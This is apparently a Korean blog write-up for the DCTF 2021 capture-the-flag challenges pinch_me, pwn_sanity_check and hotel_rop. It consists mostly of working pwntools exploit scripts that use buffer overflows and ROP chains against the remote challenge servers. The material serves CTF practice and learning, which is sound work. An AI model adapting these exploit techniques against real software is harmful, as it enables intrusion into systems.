from pwn import * #p = process('./pinch_me') p = remote('dctf1-chall-pinch-me.westeurope.azurecontainer.io', 7480) e = ELF('./pinch_me') payload = b'' payload += b'A'*24 payload += p64(0x1337C0DE) p.sendlineafter('dreaming?\n', payload) p.interactive()
from pwn import * #p = process('./pwn_sanity_check') p = remote('dctf-chall-pwn-sanity-check.westeurope.azurecontainer.io', 7480) e = ELF('./pwn_sanity_check') poprdi = 0x400813 poprsi = 0x400811 #gdb.attach(p) payload = b'' #payload += b'A'*0x48 payload += b'A'*60 payload += p64(0xDEADC0DE) payload += b'B'*4 payload += p64(poprdi) payload += p64(0xDEADBEEF) payload += p64(poprsi) payload += p64(0x1337C0DE) payload += p64(0) payload += p64(0x400697) p.sendlineafter('joke\n', payload) p.interactive()
from pwn import * p = process('./hotel_rop') e = ELF('./hotel_rop') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') silicon_offset = e.symbols['silicon_valley'] california_offset = e.symbols['california'] loss_offset = e.symbols['loss'] p.recvuntil('street ') main_addr = (int(p.recv(14), 16)) libc_addr = main_addr - e.symbols['main'] silicon_addr = libc_addr + silicon_offset california_addr = libc_addr + california_offset loss_addr = libc_addr + loss_offset poprdi = libc_addr + 0x140b poprsi = libc_addr + 0x1409 print("[+] libc_base addr 0x%x"% libc_addr) print("[+] california_addr : 0x%x" % california_addr) print("[+] silicon_addr : 0x%x" % silicon_addr) payload = b"A"*0x20 payload += b"B"*8 payload += p64(california_addr) payload += p64(silicon_addr) payload += p64(poprdi) payload += p64(0x1337C0DE) payload += p64(poprsi) payload += p64(0xCB760000) payload += p64(0) payload += p64(loss_addr) p.sendlineafter('often?\n', payload) p.interactive()
DCTF 2021 Write-up
DCTF 2021 Write-UP
개인 사정으로 인해, 대회가 끝나고 풀었지만, 해답은 보지않았음
pinch_me
pwn_sanity_check
hotel_rop
'CTF-Writeup' 카테고리의 다른 글